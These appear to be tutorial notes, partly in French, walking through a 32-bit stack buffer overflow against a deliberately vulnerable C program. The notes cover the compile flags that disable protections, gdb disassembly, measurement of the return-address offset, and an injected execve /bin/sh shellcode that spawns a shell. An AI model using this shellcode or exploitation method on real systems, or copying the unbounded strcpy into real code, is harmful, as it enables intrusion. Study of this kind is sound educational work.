Combreal

bufferOverflowPixisTut

Aug 6th, 2020
  1. #BOF pixis tut
  2. https://www.youtube.com/watch?v=V7Gdc32XRhA
  3.  
  4. #include <stdio.h>
  5. #include <stdlib.h>
  6. #include <string.h>
  7.  
/*
 * func — copy the command-line argument into a fixed 32-byte stack buffer
 * and print it. This is the deliberately vulnerable routine the tutorial
 * studies: strcpy() copies until the first NUL with no length check, so any
 * argument of 32 or more characters runs past `buffer` and, with enough
 * input, over the saved frame pointer and return address (the gdb session
 * below measures 44 bytes from the start of `buffer` to the saved EIP).
 * The defensive fix is a bounded copy such as
 * snprintf(buffer, sizeof buffer, "%s", arg); it is left unbounded here
 * because every later step of the walkthrough depends on the overflow.
 */
void func(char *arg)
{
    char buffer[32];                /* room for 31 chars + NUL, no more */
    strcpy(buffer,arg);             /* unbounded copy: overflows when strlen(arg) >= 32 */
    printf("%s\n", buffer);
}
  14.  
/*
 * Entry point. Expects exactly one argument (argc == 2) and hands it to
 * func() unchecked; with any other argument count it prints "binary \n"
 * (a usage placeholder) and returns 0 either way. As the disassembly of
 * main below shows, the compiler turns this constant-string printf into
 * a call to puts@plt.
 */
int main(int argc, char *argv[])
{
    if(argc != 2) printf("binary \n");   /* wrong argument count: usage placeholder */
    else func(argv[1]);                  /* argv[1] goes straight into the 32-byte buffer */
    return 0;
}
  21.  
  22. gcc -m32 -fno-stack-protector -z execstack test.c -w -g -o test
  23. peda test
  24. r $(perl -e 'print "A"x100')
  25. --> seg fault
  26. disass main
  27. 0x08048471 <+0>:     push   ebp
  28.    0x08048472 <+1>:     mov    ebp,esp
  29.    0x08048474 <+3>:     and    esp,0xfffffff0
  30.    0x08048477 <+6>:     sub    esp,0x10
  31.    0x0804847a <+9>:     cmp    DWORD PTR [ebp+0x8],0x2
  32.    0x0804847e <+13>:    je     0x804848e <main+29>
  33.    0x08048480 <+15>:    mov    DWORD PTR [esp],0x8048540
  34.    0x08048487 <+22>:    call   0x8048330 <puts@plt>
  35.    0x0804848c <+27>:    jmp    0x804849e <main+45>
  36.    0x0804848e <+29>:    mov    eax,DWORD PTR [ebp+0xc]
  37.    0x08048491 <+32>:    add    eax,0x4
  38.    0x08048494 <+35>:    mov    eax,DWORD PTR [eax]
  39.    0x08048496 <+37>:    mov    DWORD PTR [esp],eax
  40.    0x08048499 <+40>:    call   0x804844c <func>
  41.    0x0804849e <+45>:    mov    eax,0x0
  42.    0x080484a3 <+50>:    leave
  43.    0x080484a4 <+51>:    ret
  44. disass func
  45. 0x0804844c <+0>:     push   ebp
  46.    0x0804844d <+1>:     mov    ebp,esp
  47.    0x0804844f <+3>:     sub    esp,0x38
  48.    0x08048452 <+6>:     mov    eax,DWORD PTR [ebp+0x8]
  49.    0x08048455 <+9>:     mov    DWORD PTR [esp+0x4],eax
  50.    0x08048459 <+13>:    lea    eax,[ebp-0x28]
  51.    0x0804845c <+16>:    mov    DWORD PTR [esp],eax
  52. => 0x0804845f <+19>:    call   0x8048320 <strcpy@plt>
  53.    0x08048464 <+24>:    lea    eax,[ebp-0x28]
  54.    0x08048467 <+27>:    mov    DWORD PTR [esp],eax
  55.    0x0804846a <+30>:    call   0x8048330 <puts@plt>
  56.    0x0804846f <+35>:    leave
  57.    0x08048470 <+36>:    ret
  58. b *0x0804844c #break sur la première instruction de func
  59. b *0x0804845f #strcpy dans func
  60. r $(perl -e 'print "A"x100')
  61. x/xw $esp
  62.    0xbffffbec:     0x0804849e #0x0804849e est l'@ de retour (main+45, l'instruction qui suit le call func) qui deviendra $eip au ret
  63. x/4i 0x0804849e
  64.    0x804849e <main+45>: mov    eax,0x0
  65.    0x80484a3 <main+50>: leave
  66.    0x80484a4 <main+51>: ret  #on retrouve cela dans disass main
  67.    0x80484a5:   nop  
  68. c
  69. dumpargs
  70.    arg[0]: 0xbffffbc0 --> 0x0
  71.    arg[1]: 0xbffffdd9 ('A' <repeats 100 times>)
  72. p/d  0xbffffbec-0xbffffbc0 #@ sauvegarde EIP - @ début buffer = 44 octets (offset jusqu'à l'@ de retour)
  73. r $(perl -e 'print "A"x44 . "ABCD"')
  74. c
  75. c
  76.    Stopped reason: SIGSEGV
  77.    0x44434241 in ?? () #contrôle du flux d'exécution : EIP = 0x44434241 = "ABCD" (little-endian)
  78. r $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x90"x(44-23) . "ABCD"')
  79. c
  80. c
  81.    Stopped reason: SIGSEGV
  82.    0x44434241 in ?? () #contrôle du flux d'exécution : EIP = 0x44434241 = "ABCD" (little-endian)
  83. r $(perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x90"x(44-23) . "\xf0\xfb\xff\xbf"') #0xbffffbf0 @ où est stockée le contenu du buffer
  84. c
  85. c
  86. process 11897 is executing new program: /bin/dash
  87.  